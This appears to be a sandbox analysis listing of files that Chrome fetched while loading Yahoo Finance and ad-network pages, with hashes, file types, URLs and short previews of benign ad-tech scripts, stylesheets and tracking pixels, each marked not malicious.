                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{. "brandProtection": {. "badv": {. "1111.com.tw": true,. "1keygou.com": true,. "3oaksorchard.com": true,. "43cbd.com": true,. "4everstamp.com": true,. "aax.com": true,. "abloodsugaroption.com": true,. "abra.com": true,. "accessmediaportal.com": true,. "acebarry.com": true,. "acticatin.com": true,. "actiongamesplace.com": true,. "actualitateavranceana.ro": true,. "adameve.com": true,. "adblocker.vpnwelt.com": true,. "aditore.com": true,. "adlock.com": true,. "adpushup.com": true,. "adremover.com": true,. "adremover.org": true,. "adrenal.ru": true,. "adriangadea.ro": true,. "adrianvigheciu.ro": true,. "adroll.com": true,. "ads.google.com": true,. "ads.sharebeast.com": true,. "adsterra.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=openx&google_hm=Yzc4ZGQ1MDktZTM0YS02ZDFjLTYyYjEtZGM3Yjg1Y2JjYTc4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (8603)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):89829
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.389493537664962
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:eziX44jGDiHrHHFxhSvP1Lc5lCTTaMOC12y3LjeDUkJ+j:wvVcSiC3j
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A6D0A06C61A81E238C5710475E9851E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8AA765F8310FAAC6D61627A13CD53252838348F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:466A85C757B0E7AAFC8FFA5F0C4FF2865D17B926018ADEA9B846DED25337E326
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A870AE2738B62CFECACCFAC67E65F50662AA7829B38E10DBD995B3CD28C951BB9766BE0C76D94A14DDA54AA80FCECCCDA2EFE6493D0A16710E2F5F3CFD1D813B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/sadbundle/3895761895101862695/Q3FY25_AURA_AWARENESS_COMPETITIVE_GEMINI_728x90/index.html?e=69&leftOffset=0&topOffset=0&c=nPjtEr9RfH&t=1&renderingType=2&ev=01_252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html><head><meta name="GCD" content="YTk3ODQ3ZWZhN2I4NzZmMzBkNTEwYjJl20d2f70db10861b49cce1a3036a21603" />. <meta charset="utf-8">. <meta name="generator" content="Google Web Designer 16.1.0.0530">. <meta name="template" content="Banner 3.0.0">. <meta name="environment" content="gwd-dv360">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <style>gwd-page{display:block}.gwd-inactive{visibility:hidden}</style>. <style>.gwd-pagedeck{position:relative;display:block}.gwd-pagedeck>.gwd-page.transparent{opacity:0}.gwd-pagedeck>.gwd-page{position:absolute;top:0;left:0;transition-property:transform,opacity}.gwd-pagedeck>.gwd-page.linear{transition-timing-function:linear}.gwd-pagedeck>.gwd-page.ease-in{transition-timing-function:ease-in}.gwd-pagedeck>.gwd-page.ease-out{transition-timing-function:ease-out}.gwd-pagedeck>.gwd-page.ease{transition-timing-function:ease}.gwd-pagedeck>.gwd-page.ease-in-out{transition-timing-function:ease-in-out}.ease *,.ea
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.93122601444392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:QkcrZHeiemtvoJfLwHTdczLMow1wKoAziMwDMRnPP7v:IZhtvoJfLw36kADMRPPL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5E879D5952B5DD4E0B8CBCC3EE041271
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A7A7C941F2D09485C2DC7E56340ADA00EA261D2A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:51CFE47635DFF80E1890E6BF14E3FC79A90C032DF551416B5B1F36DAAE0DCED9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2E4C2C8DE5445321DA3EE0723AEBF0DA0EBF788DDA2BDBE257E673A0F6940F0D563CBC673F68CE2CA3E899E3E5DFA76184143B0C5EEA1B53BBB2516E0ADC39EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/PageProgressBar.DFY6QScX.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:body:has(div[data-ad-config=disable-e2e]) #sda-E2E{display:none}#sda-E2E{min-height:90px;background-color:var(--surface3);box-sizing:content-box}body:has(div[data-ad-config=large-placeholder-e2e]) #sda-E2E{min-height:250px}@media only screen and (max-width: 767px){body:has(div[data-ad-config=sticky-e2e]) #sda-E2E{position:sticky;top:0;z-index:11}#sda-E2E,body:has(div[data-ad-config=large-placeholder-e2e]) #sda-E2E{min-height:50px}}div[data-ad-config].yf-u7ti49{display:none}@layer theme{:root{--size-border-radius-none:0;--size-border-radius-xs:.125rem;--size-border-radius-s:.25rem;--size-border-radius-m:.5rem;--size-border-radius-l:1rem;--size-border-radius-xl:2rem;--size-border-radius-2xl:2.25rem;--size-font-xs:.6875rem;--size-font-s:.75rem;--size-font-m:.875rem;--size-font-l:1rem;--size-font-xl:1.125rem;--size-font-2xl:1.25rem;--size-font-3xl:1.5rem;--size-font-4xl:1.75rem;--size-font-5xl:1.875rem;--size-font-6xl:2rem;--size-font-7xl:2.375rem;--size-font-8xl:2.5rem;--size-font-10xl:3.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (837)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):838
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.016486540029626
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:ygLgoR1fw1Cva/8tXnjjOsEx/pW2/QV7Fz:FczgwojlwpclFz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FEEDF4666D1DF1064F9075EFDF8901A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9DAF89443B6C6E0CBB27F2BC30DAB37D81C4026F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D6785974AAB02B2C64C0449BED6EFDCACE034A09920CC95C93F2A83C8BB89314
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:47349C8599D66F4FDEFD3AD1A6B0153B05E10E59D2FCF73F8B0F4BFDB17F947F5CEA124D4CFCD3F2199FADCC5756F5A69ABFD2AAA3F21F4D7E6D6AA2962BACE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/2.CP-kRmco.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.app-banner.yf-1ijw7ja,.content-wrapper.yf-1ijw7ja{align-items:center;display:flex}.content-wrapper.yf-1ijw7ja{align-items:center}.app-banner.yf-1ijw7ja{border-bottom:1px solid var(--light-divider);justify-content:space-between;padding:var(--space-2) var(--space-5);transform:translateY(0);transition:transform .3s ease-in;will-change:transform}.app-banner.yf-1ijw7ja:not(.open){transform:translateY(-100%)}.img-wrapper.yf-1ijw7ja{margin:0 var(--space-3) 0 var(--space-2);aspect-ratio:1}@layer layout{header.yf-1m8s98o{z-index:10;position:sticky;top:0}header.yf-1m8s98o #ybar-inner-wrap{position:relative!important;box-shadow:none!important}@media only screen and (max-width: 767px){header.stickyAd.yf-1m8s98o{top:calc(var(--ad-top) + var(--space-4))}}@media only screen and (min-width: 1050px){header.yf-1m8s98o{position:sticky;top:0}}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0950611313667666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/dot.gif?gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2670)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):122888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.440233200848619
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:rwbsrHKnIyp5sjLWcgk27Zvzfi5m/OfzFu7R/p+pPRFOo0XifSOKfQ29j:N++WtiBQ/San5f5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5652DA563FF106C6A24852F92AB1D14C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:04F2F5DD2590CD7BF593D7E9B43B09BA7EF63146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:31D02F43DD0C7FC5C0D95DB087A23F1C2D729C93F10450884C8DA6B415F7839B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:31A0036F85A983F3F4C6036C074B90BD74216561EC69369F7789D1524A1B8E0A245C73D0D6ACFD5B61BC94069BB5108A25D477EB86898377F8F82199B398098A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/879366/Enabler_01_250.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){var DEPS_GRAPH={'enablermodule':[],'configurablemodule':['enablermodule'],'gdnmodule':['enablermodule'],'layoutsmodule':['enablermodule'],'videomodule':['enablermodule'],'layoutsfillermodule':['enablermodule','layoutsmodule'],'rad_ui_videomodule':['videomodule'],'$weak$':['configurablemodule','enablermodule','gdnmodule','layoutsfillermodule','layoutsmodule','rad_ui_videomodule','videomodule']};window.STUDIO_SDK_START=+new Date();/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var h,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)r
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?gdpr=0&gdpr_consent=&us_privacy=1YNN&predirect=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dpubmatic%26gdpr%3D0%26gdpr_consent%3D%26gpp%3DDBAA%26gpp_sid%3D-1%26f%3Db%26uid%3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (874)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):875
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.284809417084082
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:D4UXmq2Ap10VuTSfxGRxYoHsevNA/jAAjecolh:sU2q2zVnon7HlWUAjk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0B1D6E34DC33149A4FFBF53C9614D26C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B6AFC8747765CD6C3191EF0F49C187EFF1E27BDB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5ABA15A038ADD29FE2381209A498D607972BF9CE052D94D59152DAA2541DE35C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8591FCB0D517D329A19537ECB7D0FA83894280B33EA65E2877F29EF7516DB25F3FF307053A075F6F018065F0957674378A18DEBCEC36DC283F5345C0F3F4F8DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/NoContent.B0omCaLg.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as u,e as r,t as N,d as f,f as _,h as v,i as m,q as o,k as g,l as d,m as p,n as h}from"./scheduler.Dr9AAxFe.js";import{S as y,i as S}from"./index.DCSmZEjO.js";import{t as z}from"./commonUtil.CI22_Irn.js";function E(l){let s,t,e,n;return{c(){s=r("div"),t=r("p"),e=N(l[0]),this.h()},l(a){s=f(a,"DIV",{class:!0});var i=_(s);t=f(i,"P",{class:!0});var c=_(t);e=v(c,l[0]),c.forEach(m),i.forEach(m),this.h()},h(){o(t,"class","yf-32mzn4"),o(s,"class",n="no-content "+l[1]+" yf-32mzn4")},m(a,i){g(a,s,i),d(s,t),d(t,e)},p(a,[i]){i&1&&p(e,a[0]),i&2&&n!==(n="no-content "+a[1]+" yf-32mzn4")&&o(s,"class",n)},i:h,o:h,d(a){a&&m(s)}}}function q(l,s,t){let{msg:e=z("MSG_NO_NEWS")}=s,{className:n=""}=s;return l.$$set=a=>{"msg"in a&&t(0,e=a.msg),"className"in a&&t(1,n=a.className)},[e,n]}class D extends y{constructor(s){super(),S(this,s,q,E,u,{msg:0,className:1})}}export{D as N};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1760)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1761
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.209769182472249
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:RUAOqJDh2TCbRM4wn1fhPB9WieXIpW/tigBeJgnpNF6s5:SAXJDhXM1fIie40liy1p6s5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CCC8E8622D9B302E99027D98B5ED6442
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C1005DA8DE172CAB3861617CCBEC0D0B5E446CF3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F9D7D167400955D50562C84BA9DB06FBE0E6946BC69D21CDB02A13764F44BA62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B76577A44256D3E63A7DCC0E7575D356E9B04C6D4D1BDA67B82D850738DDFD81B4846E4380AF9E863E70434F7E55E633903A97F8D978561350F34449AF07F1D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/ads.DhuB_mth.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var l=(r=>(r.DESTROYED="nimbus:ad-destroyed",r.AD_CONTROLLER_READY="nimbus:ad-controller-ready",r))(l||{});function m(r){return new CustomEvent("nimbus:ad-destroyed",{detail:r})}function S(r){return new CustomEvent("nimbus:ad-controller-ready",{detail:r})}function y(r,n){return r.replace(/{{(.*?)}}/g,(e,t)=>n[t]!=null?n[t].toString():e)}function b(r,n={}){return Object.entries(r).reduce((e,[t,i])=>{if(i)if("path"in i){const a=y(i.path,n);e[t]={...i,path:a}}else e[t]=i;return e},{})}function f(r){return Array.isArray(r)&&r.length===2&&typeof r[0]=="number"&&typeof r[1]=="number"}function s(r,n=","){return Array.isArray(r)?f(r)?r.join("x"):r.map(e=>Array.isArray(e)?e.join("x"):e.toString()).join(n):r??""}function c(r,{width:n}){return r[0]<=n}function g(r,n){if(!Array.isArray(r))return r;if(f(r))return c(r,n)?r:void 0;const e=r.filter(t=>!f(t)||c(t,n));return e.length?e:void 0}const d=10;function h(r){if(Array.isArray(r)){if(f(r)){const[n,e]=r;return e<d?void 0:e}for(const n of r){if(!f(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65514)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):445118
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3591700168638035
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6144:yag8sSQcw0hC90iYV8arFoqDmpv3UJt1L0O3AGWaIILC97:ya3sVyIRYmBU/173uaQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2EC3819E22244BE1E9AE83299EE7D8F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F2CC9F451A0AAFC617FD29F0CAB23A46D1E5C04F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2992C7E2DC30CCABFACDCD749B1B0D6E6F7D9F36A7CDFC657FB98FA48B8258D1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FDD75D95F43EE0A6A8AC0510195B903B2BC433EE754F07931876B0FA4A169D92773F9BC579B4835C194C950C0773CD90D914206AB91A3266BB5D3DCC89005D06
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! v6793 ac3acb95 */.var __dv_global_script_start_time__="undefined"!=typeof performance&&"function"==typeof performance.now?performance.now():void 0,__webpack_modules__={2328:function(t,e){"use strict";Object.defineProperty(e,"__esModule",{value:!0}),e.DATA_NODE_KEY=e.MONITORING_TAG_ON_TOP_LEVEL_KEY=e.TRACKING_RATE_KEY=e.TRACKING_EVENT_CATEGORY=e.TRACKING_BASE_URL=e.MAX_WINDOW_DEPTH=void 0,e.MAX_WINDOW_DEPTH=20,e.TRACKING_BASE_URL="https://vtrk.doubleverify.com",e.TRACKING_EVENT_CATEGORY="data-transparency",e.TRACKING_RATE_KEY="dv-data-transparency-tracking-rate",e.MONITORING_TAG_ON_TOP_LEVEL_KEY="dv-data-transparency-top-level-monitoring",e.DATA_NODE_KEY="dv-data-transparency-data-node"},9522:function(t,e){"use strict";Object.defineProperty(e,"__esModule",{value:!0}),e.Container=void 0;var i=function(){function t(){this.container={}}return Object.defineProperty(t.prototype,"size",{get:function(){return Object.keys(this.container).length},enumerable:!1,configurable:!0}),t.prototype.i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 240 x 34, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.732123200569469
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:HCPVHbdLb/levTWdqgmGYDQpuYpdKqLxoh5F:HCNHxL4O0QpXKqOt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D0E45188F6A8F2E8F2528E762FE55D33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:42A007181ABDADCC4C79D03D74B08F39DDDC5127
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DEB2DC4C95EA5B692229713672E7AEAE32B3914BAFCD63F926116D6637BD1976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0FD2F174A63472217D8BC23DE69DCBCAA1A583DED45152430D1A5BA455F6B1F360815DB34B5C8F96DA7DAAE232DB52197775F7F50955F497D6B664EB93B58800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
